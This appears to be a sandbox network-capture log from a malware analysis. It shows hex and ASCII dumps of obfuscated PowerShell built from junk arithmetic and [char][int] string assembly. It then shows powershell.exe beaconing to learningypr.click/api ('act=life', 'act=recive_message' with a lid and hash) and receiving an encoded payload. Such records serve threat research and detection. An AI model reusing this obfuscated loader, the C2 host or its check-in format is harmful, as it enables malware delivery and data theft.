                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 44 50 73 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 46 43 4f 71 78 6a 57 53 44 61 2d 31 36 2d 24 51 43 48 78 45 74 57 74 70 58 65 43 46 2d 34 2d 34 34 2d 24 66 4f 68 55 4a 7a 6f 42 4d 77 29 29 2b 28 28 24 51 55 56 4d 6c 78 6b 69 68 43 54 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 56 48 78 51 55 79 79 43 20 3d 20 36 31 30 0d 0a 24 69 61 6e 54 61 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 72 5a 74 47 4b 63 61 50 69 73 59 20 3d 20 24 55 73 46 6b 4f 71 50 6a 74 4e 0d 0a 24 4d 58 6b 62 43 6c 56 59 73 70 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 50 57 4d 74 73 43 76 73 20 3d 20 24 45 46 43 4f 71 78 6a 57 53 44 61 0d 0a 7d 0d 0a 28 28 28 33 2b 32 39 2d 28 34 37 2d 33 36 2a 33 35 2a 33 38 2b
                                                                                                            Data Ascii: DPsf)-(37-40-4)){(((($EFCOqxjWSDa-16-$QCHxEtWtpXeCF-4-44-$fOhUJzoBMw))+(($QUVMlxkihCT-39-23)))) {$VHxQUyyC = 610$ianTaW = $lBctzLCsWvrsW$rZtGKcaPisY = $UsFkOqPjtN$MXkbClVYspW = $lBctzLCsWvrsW$PWMtsCvs = $EFCOqxjWSDa}(((3+29-(47-36*35*38+
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 3d 20 28 28 28 28 28 33 31 2d 37 2a 31 32 29 2a 34 31 2a 31 30 2d 28 34 2d 34 37 2a 33 31 2a 34 37 2a 31 32 2a 32 32 29 29 2d 28 33 34 2a 33 35 2a 38 29 29 2d 28 31 38 30 34 37 30 30 38 29 29 29 0d 0a 24 5a 59 71 47 47 20 3d 20 24 69 59 62 63 64 68 47 4d 4a 74 0d 0a 24 78 51 41 74 6c 4b 55 66 4d 20 3d 20 24 65 73 6b 57 51 6c 6e 4b 56 75 0d 0a 0d 0a 24 4b 53 59 6c 6e 54 59 44 4d 55 20 3d 20 28 28 24 66 4f 68 55 4a 7a 6f 42 4d 77 2d 34 37 2d 28 32 37 2d 32 32 2b 31 29 29 2b 24 69 61 6e 54 61 57 2d 34 37 2d 32 33 2b 24 4a 52 4f 47 46 75 76 69 64 2b 33 34 2b 31 30 2d 28 34 35 38 29 29 0d 0a 24 78 4c 64 58 59 43 44 45 73 4e 72 51 47 20 3d 20 28 28 31 32 2d 33 39 2b 24 63 7a 49 78 54 52 52 79 58 57 6b 44 6d 55 29 2d 28 31 37 2b 31 2b 24 45 46 43 4f 71 78 6a 57
                                                                                                            Data Ascii: = (((((31-7*12)*41*10-(4-47*31*47*12*22))-(34*35*8))-(18047008)))$ZYqGG = $iYbcdhGMJt$xQAtlKUfM = $eskWQlnKVu$KSYlnTYDMU = (($fOhUJzoBMw-47-(27-22+1))+$ianTaW-47-23+$JROGFuvid+34+10-(458))$xLdXYCDEsNrQG = ((12-39+$czIxTRRyXWkDmU)-(17+1+$EFCOqxjW
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 2d 34 38 29 29 2d 28 32 32 29 29 0d 0a 24 4f 45 72 75 67 56 6b 61 4d 45 20 3d 20 28 28 28 28 34 38 2b 33 34 2b 24 66 4f 68 55 4a 7a 6f 42 4d 77 29 29 29 2b 28 32 34 2b 34 35 2d 24 53 43 64 56 4e 72 72 29 2b 28 24 69 61 6e 54 61 57 2b 31 31 2b 28 24 6e 69 41 53 69 45 2b 32 34 2b 24 44 74 57 45 68 47 4f 57 69 4e 29 29 2b 28 28 34 36 2b 31 38 2b 34 29 29 2d 28 31 31 35 31 29 29 0d 0a 24 73 76 6a 78 61 63 6b 5a 74 42 76 50 52 65 20 3d 20 28 28 28 34 2b 33 31 2d 32 31 29 29 2b 33 37 2d 34 36 2b 24 4a 52 4f 47 46 75 76 69 64 2b 28 28 39 2d 31 33 2d 39 29 29 2b 28 33 32 29 29 0d 0a 24 4c 63 5a 65 54 76 42 20 3d 20 28 28 24 65 73 6b 57 51 6c 6e 4b 56 75 2d 31 36 2b 28 33 32 2b 34 34 2d 24 4b 58 7a 74 71 52 61 29 29 2b 28 28 24 72 73 42 51 6e 53 6c 6b 6f 46 2b 36
                                                                                                            Data Ascii: -48))-(22))$OErugVkaME = ((((48+34+$fOhUJzoBMw)))+(24+45-$SCdVNrr)+($ianTaW+11+($niASiE+24+$DtWEhGOWiN))+((46+18+4))-(1151))$svjxackZtBvPRe = (((4+31-21))+37-46+$JROGFuvid+((9-13-9))+(32))$LcZeTvB = (($eskWQlnKVu-16+(32+44-$KXztqRa))+(($rsBQnSlkoF+6
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 38 29 29 0d 0a 24 57 4e 64 49 72 4c 72 41 20 3d 20 28 28 28 28 34 30 2b 32 38 2b 24 4a 59 45 53 41 66 51 44 46 5a 77 72 6b 63 29 29 2b 24 79 53 6f 50 6b 77 76 7a 72 2d 34 35 2b 33 33 2b 28 34 31 2d 34 32 2b 34 34 29 29 2d 24 77 45 72 44 54 69 4b 41 6b 4d 62 6a 72 2b 33 39 2b 24 51 61 53 6e 76 70 42 50 6a 57 55 53 46 2d 24 74 74 6a 50 6d 64 69 79 5a 2d 34 2d 33 32 2d 28 34 33 31 29 29 0d 0a 24 6c 4d 4c 4e 6b 71 20 3d 20 28 28 32 37 2b 33 39 2b 35 29 2b 24 62 58 4c 67 65 54 73 6f 59 2d 34 31 2d 32 37 2b 24 51 43 48 78 45 74 57 74 70 58 65 43 46 2d 39 2d 34 35 2d 28 31 30 31 35 29 29 0d 0a 24 48 79 70 67 6c 45 46 6b 42 42 52 20 3d 20 28 28 28 24 4d 58 6b 62 43 6c 56 59 73 70 57 2b 34 39 2d 31 32 29 2b 28 24 4e 6d 45 47 52 6f 2b 36 2b 24 62 58 4c 67 65 54 73
                                                                                                            Data Ascii: 8))$WNdIrLrA = ((((40+28+$JYESAfQDFZwrkc))+$ySoPkwvzr-45+33+(41-42+44))-$wErDTiKAkMbjr+39+$QaSnvpBPjWUSF-$ttjPmdiyZ-4-32-(431))$lMLNkq = ((27+39+5)+$bXLgeTsoY-41-27+$QCHxEtWtpXeCF-9-45-(1015))$HypglEFkBBR = ((($MXkbClVYspW+49-12)+($NmEGRo+6+$bXLgeTs
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 72 5d 5b 69 6e 74 5d 24 4b 70 6f 4b 58 64 45 73 72 62 7a 46 73 4a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 62 55 5a 6d 43 6a 41 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 79 69 56 68 6d 77 61 50 63 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4a 4f 48 61 70 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 58 75 63 41 51 55 4b 4e 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 61 51 4a 42 77 42 6b 6c 73 46 6d 50 43 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 49 79 55 67 77 42 75 6b 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 70 58 68 61 55 54 62 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 44 61 56 4b 57 51 4a 55 6d 42 5a 57 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 45 6c 43 41 77 44 43 4b 65 48 59 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24
                                                                                                            Data Ascii: r][int]$KpoKXdEsrbzFsJ + [char][int]$SbUZmCjA + [char][int]$KyiVhmwaPc + [char][int]$JOHap + [char][int]$XucAQUKN + [char][int]$aQJBwBklsFmPC + [char][int]$IyUgwBuk + [char][int]$ApXhaUTb + [char][int]$DaVKWQJUmBZW + [char][int]$ElCAwDCKeHY + [char][int]$
                                                                                                            2024-12-22 12:42:15 UTC1369INData Raw: 29 29 29 20 0d 0a 7b 0d 0a 24 56 48 78 51 55 79 79 43 20 3d 20 36 31 30 0d 0a 24 69 61 6e 54 61 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 72 5a 74 47 4b 63 61 50 69 73 59 20 3d 20 24 55 73 46 6b 4f 71 50 6a 74 4e 0d 0a 24 4d 58 6b 62 43 6c 56 59 73 70 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 50 57 4d 74 73 43 76 73 20 3d 20 24 45 46 43 4f 71 78 6a 57 53 44 61 0d 0a 7d 0d 0a 28 28 28 33 2b 32 39 2d 28 34 37 2d 33 36 2a 33 35 2a 33 38 2b 34 31 2d 28 33 31 2d 31 33 2a 31 38 29 29 29 2d 28 34 37 36 30 33 29 29 29 20 0d 0a 7b 0d 0a 24 41 4a 56 63 55 54 72 48 72 70 45 20 3d 20 39 31 34 0d 0a 24 79 4a 6b 70 6d 54 4c 51 20 3d 20 24 4d 58 6b 62 43 6c 56 59 73 70 57 0d 0a 7d 0d 0a 28 28 28 24 72 73 42 51 6e 53 6c 6b 6f 46
                                                                                                            Data Ascii: ))) {$VHxQUyyC = 610$ianTaW = $lBctzLCsWvrsW$rZtGKcaPisY = $UsFkOqPjtN$MXkbClVYspW = $lBctzLCsWvrsW$PWMtsCvs = $EFCOqxjWSDa}(((3+29-(47-36*35*38+41-(31-13*18)))-(47603))) {$AJVcUTrHrpE = 914$yJkpmTLQ = $MXkbClVYspW}((($rsBQnSlkoF


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.650007104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:20 UTC264OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-22 12:44:21 UTC1131INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:21 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=85h2ndbph8ed4hbajr5pnlmsr1; expires=Thu, 17 Apr 2025 06:31:00 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYgjYcaZNuKI30jfhk%2BIN%2FoHiGLFFRlG6g26vUyGLMTx8UAzdIo0oLJm%2FAzt3NKyX39leO60Znj6qYk73swYHM6jFboSF7OTdAA4CaewyaIxRp937z1LQ1L2gtaxVqopJZS0%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6033e6eaac42e9-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1691&rtt_var=649&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1666666&cwnd=239&unsent_bytes=0&cid=b031031e94e447d6&ts=918&x=0"
                                                                                                            2024-12-22 12:44:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-22 12:44:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.650008104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:22 UTC265OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 78
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:22 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                            2024-12-22 12:44:23 UTC1139INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:23 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=91f3imbemm4jqr7p198i10m48f; expires=Thu, 17 Apr 2025 06:31:02 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JasUDAj9%2ByLv8kT9C3pqQUKFcFG3Dpl%2ByMQRoiPAQ2E6%2FFXWRaVTn7gceDWjOE1%2BmUZvpEhfx%2FmUhWYsOdiVACRNFro%2FF%2B2rEVDOgKdXDmblF4uMOI7G5oOFQPEWTIKhnZ%2FHMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6033f42a12c323-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1470&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=979&delivery_rate=1935056&cwnd=214&unsent_bytes=0&cid=248e130633e00fa7&ts=820&x=0"
                                                                                                            2024-12-22 12:44:23 UTC230INData Raw: 31 63 61 64 0d 0a 57 71 50 79 68 76 71 53 62 6f 78 6c 39 66 4e 38 33 51 49 32 57 74 49 43 58 65 73 4b 33 78 46 4d 44 36 41 6f 6b 64 68 5a 77 56 49 68 67 59 53 6b 77 4b 5a 43 72 68 61 51 30 55 61 37 59 31 6f 70 74 79 35 2f 69 6d 37 39 4b 79 70 75 7a 46 76 30 39 48 75 33 50 33 69 5a 6c 4f 65 57 34 51 75 67 52 35 43 4c 58 75 64 5a 54 58 69 33 62 48 2f 52 4b 4c 70 37 4c 6d 37 4d 53 76 43 7a 4e 72 45 2b 4f 63 75 65 34 5a 4c 33 44 65 67 45 6d 5a 34 5a 75 47 64 58 4d 4c 78 72 4d 49 4e 6e 2f 54 31 75 61 74 6f 4b 71 2f 6f 55 70 43 59 37 37 70 50 31 6b 62 41 54 6f 42 37 58 6c 68 4c 2f 4f 42 51 37 74 32 41 78 6a 57 36 30 65 53 52 6e 78 45 76 31 73 69 6d 6f 4e 44 4c 4c 6b 4f 4b 54 2f 51 54 38
                                                                                                            Data Ascii: 1cadWqPyhvqSboxl9fN83QI2WtICXesK3xFMD6AokdhZwVIhgYSkwKZCrhaQ0Ua7Y1opty5/im79KypuzFv09Hu3P3iZlOeW4QugR5CLXudZTXi3bH/RKLp7Lm7MSvCzNrE+Ocue4ZL3DegEmZ4ZuGdXMLxrMINn/T1uatoKq/oUpCY77pP1kbAToB7XlhL/OBQ7t2AxjW60eSRnxEv1simoNDLLkOKT/QT8
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 43 5a 4f 5a 45 72 35 74 56 33 6a 2b 49 44 69 52 4b 4f 55 7a 66 56 2f 42 57 2b 4b 76 4e 72 4d 32 65 4e 37 65 2f 64 6a 33 41 4b 35 66 31 35 6b 53 73 57 56 58 4e 37 64 68 50 35 74 6e 76 58 41 6d 5a 63 5a 41 2f 4c 55 30 72 54 6f 2f 79 5a 6e 6a 6c 2f 63 45 36 41 69 55 30 56 44 2f 5a 30 78 34 36 43 41 66 6d 57 75 2b 5a 79 4e 38 67 6c 57 39 6f 33 75 6b 50 48 69 5a 30 4f 4b 57 38 51 48 75 46 5a 2b 61 46 62 70 79 58 7a 47 39 62 54 2b 45 59 72 4a 77 4c 6d 72 49 51 50 79 77 50 36 34 39 50 73 47 51 70 4e 61 77 43 2f 5a 48 7a 39 45 39 75 6e 42 54 4e 4b 59 69 42 63 6c 33 38 32 70 75 61 73 34 4b 71 2f 6f 7a 70 6a 4d 37 79 70 2f 6e 6b 50 73 65 37 68 57 52 6e 42 75 74 5a 6c 45 32 75 6d 4d 74 67 32 61 37 63 43 64 6d 79 30 2f 30 76 6e 76 74 63 44 2f 5a 30 4c 7a 59 30 51 48
                                                                                                            Data Ascii: CZOZEr5tV3j+IDiRKOUzfV/BW+KvNrM2eN7e/dj3AK5f15kSsWVXN7dhP5tnvXAmZcZA/LU0rTo/yZnjl/cE6AiU0VD/Z0x46CAfmWu+ZyN8glW9o3ukPHiZ0OKW8QHuFZ+aFbpyXzG9bT+EYrJwLmrIQPywP649PsGQpNawC/ZHz9E9unBTNKYiBcl382puas4Kq/ozpjM7yp/nkPse7hWRnButZlE2umMtg2a7cCdmy0/0vnvtcD/Z0LzY0QH
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 68 71 2b 61 6b 59 71 73 47 77 74 68 57 4b 37 66 43 4e 68 67 67 53 7a 76 53 50 6a 61 48 6a 72 6b 2f 43 62 2b 6b 37 62 42 4a 6d 66 47 61 6b 67 53 33 61 70 49 44 69 46 4b 4f 55 7a 49 32 7a 4b 54 4f 47 31 4e 71 41 2b 4e 73 36 56 36 35 44 77 44 4f 4d 43 6b 35 6f 56 76 47 31 51 4b 72 70 67 4e 34 78 70 74 33 6c 75 49 34 4a 4e 36 2f 70 6a 34 77 45 76 79 74 4c 52 6d 2f 34 43 36 52 48 58 6a 6c 43 6d 49 46 4d 30 38 44 68 2f 68 47 43 34 64 69 46 73 79 45 54 32 73 44 65 72 50 6a 76 54 6e 2b 43 59 2f 41 54 6b 43 70 6d 56 46 72 5a 72 58 7a 36 77 59 54 58 4a 4a 76 31 30 4e 69 32 61 43 73 65 39 4e 36 34 2f 65 76 53 54 36 70 62 33 47 71 34 59 32 59 68 65 75 47 77 55 59 50 42 73 4e 6f 6c 6a 74 33 63 75 61 73 39 50 38 4c 30 34 72 6a 63 79 7a 35 66 67 6c 50 6b 42 36 41 65 51
                                                                                                            Data Ascii: hq+akYqsGwthWK7fCNhggSzvSPjaHjrk/Cb+k7bBJmfGakgS3apIDiFKOUzI2zKTOG1NqA+Ns6V65DwDOMCk5oVvG1QKrpgN4xpt3luI4JN6/pj4wEvytLRm/4C6RHXjlCmIFM08Dh/hGC4diFsyET2sDerPjvTn+CY/ATkCpmVFrZrXz6wYTXJJv10Ni2aCse9N64/evST6pb3Gq4Y2YheuGwUYPBsNoljt3cuas9P8L04rjcyz5fglPkB6AeQ
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 67 55 59 50 42 72 43 6f 64 2b 2f 57 78 67 64 49 4a 4e 2f 2f 70 6a 34 7a 6b 78 30 35 37 71 6b 66 30 4b 35 67 43 5a 6e 42 57 35 61 31 4d 2f 74 6d 30 33 68 47 32 2b 63 69 70 6e 30 45 6e 34 73 44 61 70 63 48 61 42 6c 2f 7a 59 71 45 7a 4a 43 37 36 42 42 61 31 32 46 43 66 2b 65 58 2b 4f 5a 50 30 72 62 6d 37 4e 51 2f 79 79 4d 36 77 2f 50 4d 2b 57 34 70 58 31 41 2b 51 56 6e 35 38 54 74 47 39 66 4b 72 42 74 4f 34 56 73 74 58 67 6b 4c 59 77 4b 39 4b 4a 37 2b 33 41 4e 7a 4a 2f 6b 6d 2b 5a 4d 38 55 6d 4f 30 52 6d 7a 49 41 78 34 76 47 34 2f 68 6d 53 78 65 43 5a 73 7a 6b 54 30 76 7a 4b 72 4f 43 72 41 6c 4f 79 5a 2f 67 50 76 41 35 4b 55 47 72 68 6b 55 6a 66 77 4c 6e 2b 4f 63 50 30 72 62 6b 4c 6c 66 37 47 62 41 65 4d 76 64 74 6a 51 34 35 53 77 56 4b 34 4c 6c 4a 30 57 73
                                                                                                            Data Ascii: gUYPBrCod+/WxgdIJN//pj4zkx057qkf0K5gCZnBW5a1M/tm03hG2+cipn0En4sDapcHaBl/zYqEzJC76BBa12FCf+eX+OZP0rbm7NQ/yyM6w/PM+W4pX1A+QVn58TtG9fKrBtO4VstXgkLYwK9KJ7+3ANzJ/km+ZM8UmO0RmzIAx4vG4/hmSxeCZszkT0vzKrOCrAlOyZ/gPvA5KUGrhkUjfwLn+OcP0rbkLlf7GbAeMvdtjQ45SwVK4LlJ0Ws
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 38 49 47 66 4a 59 72 5a 33 4c 57 6e 48 52 66 4b 37 50 62 45 33 4d 64 4f 65 36 5a 66 34 42 4f 63 47 6b 35 51 54 75 57 78 65 4f 62 64 75 4d 59 45 6f 38 7a 4d 70 64 59 49 53 73 35 73 72 75 43 49 75 7a 4c 48 70 6c 37 41 54 6f 42 37 58 6c 68 4c 2f 4f 42 51 78 6f 6d 51 79 6d 32 47 36 66 53 46 75 30 45 76 2b 73 53 6d 6b 50 7a 7a 47 6e 4f 4b 58 39 67 33 72 44 5a 75 57 47 37 52 76 57 48 6a 2b 49 44 69 52 4b 4f 55 7a 41 47 62 52 58 66 43 30 4d 4c 55 72 65 4e 37 65 2f 64 6a 33 41 4b 35 66 31 35 49 56 74 47 52 55 4e 4c 42 6b 4d 6f 6c 36 73 6e 51 70 5a 4d 6c 59 2b 62 30 38 71 44 67 7a 7a 70 62 32 6c 50 34 65 36 78 57 46 30 56 44 2f 5a 30 78 34 36 43 41 4a 6a 6e 69 74 63 47 78 63 31 45 6e 6c 73 54 61 76 63 43 65 50 69 61 53 66 2f 45 79 32 52 35 47 65 46 37 78 76 56 54
                                                                                                            Data Ascii: 8IGfJYrZ3LWnHRfK7PbE3MdOe6Zf4BOcGk5QTuWxeObduMYEo8zMpdYISs5sruCIuzLHpl7AToB7XlhL/OBQxomQym2G6fSFu0Ev+sSmkPzzGnOKX9g3rDZuWG7RvWHj+IDiRKOUzAGbRXfC0MLUreN7e/dj3AK5f15IVtGRUNLBkMol6snQpZMlY+b08qDgzzpb2lP4e6xWF0VD/Z0x46CAJjnitcGxc1EnlsTavcCePiaSf/Ey2R5GeF7xvVT
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 6b 53 6a 6c 4d 78 5a 6d 7a 48 6a 77 6f 58 75 38 66 69 47 42 6c 2b 6a 59 71 45 7a 74 41 4a 53 51 46 4c 5a 73 57 7a 2b 30 63 6a 57 4f 65 72 78 79 4a 57 44 4f 53 76 36 33 4d 61 49 35 4e 63 32 64 34 35 2f 2f 43 61 35 4a 31 35 59 47 2f 7a 67 55 47 62 31 72 4d 39 49 79 2f 57 78 67 64 49 4a 4e 2f 2f 70 6a 34 7a 41 79 78 4a 72 70 6d 2f 38 50 2f 41 61 52 67 78 36 79 61 6b 59 79 75 32 55 79 68 47 57 2b 64 53 68 6d 7a 6c 6a 36 75 6a 69 6f 63 48 61 42 6c 2f 7a 59 71 45 7a 4e 45 49 47 62 47 62 4e 32 58 7a 6d 7a 64 6a 4b 5a 4b 50 4d 7a 50 32 72 54 43 71 75 73 4b 37 51 33 4a 34 2b 4a 70 4a 2f 38 54 4c 5a 48 6b 5a 67 59 75 47 5a 61 4b 72 56 6d 4d 49 5a 68 74 48 63 6d 62 73 4a 4f 39 37 30 2b 6f 44 77 7a 78 70 50 72 6e 50 6b 43 35 77 6a 58 33 31 36 34 65 42 52 67 38 45 45
                                                                                                            Data Ascii: kSjlMxZmzHjwoXu8fiGBl+jYqEztAJSQFLZsWz+0cjWOerxyJWDOSv63MaI5Nc2d45//Ca5J15YG/zgUGb1rM9Iy/WxgdIJN//pj4zAyxJrpm/8P/AaRgx6yakYyu2UyhGW+dShmzlj6ujiocHaBl/zYqEzNEIGbGbN2XzmzdjKZKPMzP2rTCqusK7Q3J4+JpJ/8TLZHkZgYuGZaKrVmMIZhtHcmbsJO970+oDwzxpPrnPkC5wjX3164eBRg8EE
                                                                                                            2024-12-22 12:44:23 UTC274INData Raw: 33 34 76 66 38 46 44 73 2f 52 37 70 43 68 34 6d 64 44 45 6b 2b 59 4a 36 52 48 56 70 42 32 78 62 6c 4d 75 38 48 38 41 78 79 69 38 4d 33 5a 55 32 77 72 6c 2b 6d 50 78 66 6e 6a 54 30 4c 7a 59 74 77 2f 38 46 5a 47 53 43 4c 77 6e 61 67 61 58 64 6a 57 4f 65 4c 70 6b 49 53 32 4d 43 76 7a 36 59 35 70 77 4d 63 61 4c 39 59 37 39 48 4f 6c 48 71 4e 39 65 70 79 41 4d 65 49 56 6a 4d 59 64 76 71 32 4a 6a 53 74 52 41 39 4b 6f 38 74 44 39 34 6a 39 44 69 32 4b 68 66 6f 45 65 54 67 46 37 6e 4d 41 5a 6a 35 54 4e 6f 32 54 71 69 50 54 63 74 31 41 71 72 36 48 58 6a 49 6e 69 5a 30 4b 4f 62 34 68 37 6f 42 49 47 53 57 59 46 65 63 79 4b 39 5a 69 69 59 56 6f 4e 30 4e 47 44 45 58 65 4c 32 4c 71 41 2b 4e 73 61 47 70 4e 61 77 41 36 35 66 72 74 46 57 2f 31 38 61 65 4b 67 67 5a 38 6c 64
                                                                                                            Data Ascii: 34vf8FDs/R7pCh4mdDEk+YJ6RHVpB2xblMu8H8Axyi8M3ZU2wrl+mPxfnjT0LzYtw/8FZGSCLwnagaXdjWOeLpkIS2MCvz6Y5pwMcaL9Y79HOlHqN9epyAMeIVjMYdvq2JjStRA9Ko8tD94j9Di2KhfoEeTgF7nMAZj5TNo2TqiPTct1Aqr6HXjIniZ0KOb4h7oBIGSWYFecyK9ZiiYVoN0NGDEXeL2LqA+NsaGpNawA65frtFW/18aeKggZ8ld
                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 33 31 66 33 0d 0a 4e 43 71 32 50 5a 4d 74 6c 66 5a 30 52 71 75 49 41 78 6f 34 6a 74 71 32 6a 2f 74 49 54 45 6a 32 77 72 6c 2b 6d 50 78 66 6e 6a 54 30 4c 7a 59 74 77 2f 38 46 5a 47 53 43 4c 77 6e 61 67 61 65 5a 7a 6d 4d 62 36 30 78 41 47 62 57 54 62 50 30 65 36 78 77 59 50 6a 51 72 4e 6a 50 51 71 34 66 31 38 6c 65 69 6d 4e 61 4e 72 64 32 4c 73 52 47 75 6e 55 72 61 74 49 49 33 62 45 76 70 48 42 32 67 5a 61 6b 77 4b 42 43 72 67 4f 47 30 55 62 76 4d 67 39 74 34 7a 64 76 32 33 66 7a 61 6d 35 37 67 68 4b 68 39 48 75 78 63 47 43 42 31 2b 65 4b 34 67 72 74 45 5a 54 57 49 49 46 6a 51 6a 57 2f 61 7a 36 33 56 70 4e 2b 4c 32 37 4d 43 4d 4b 73 4e 72 4d 7a 50 63 61 75 32 70 62 33 47 4f 6b 4a 6b 5a 46 65 38 53 42 62 65 4f 68 5a 66 38 45 6f 67 6a 31 75 64 59 49 53 73 34
                                                                                                            Data Ascii: 31f3NCq2PZMtlfZ0RquIAxo4jtq2j/tITEj2wrl+mPxfnjT0LzYtw/8FZGSCLwnagaeZzmMb60xAGbWTbP0e6xwYPjQrNjPQq4f18leimNaNrd2LsRGunUratII3bEvpHB2gZakwKBCrgOG0UbvMg9t4zdv23fzam57ghKh9HuxcGCB1+eK4grtEZTWIIFjQjW/az63VpN+L27MCMKsNrMzPcau2pb3GOkJkZFe8SBbeOhZf8Eogj1udYISs4
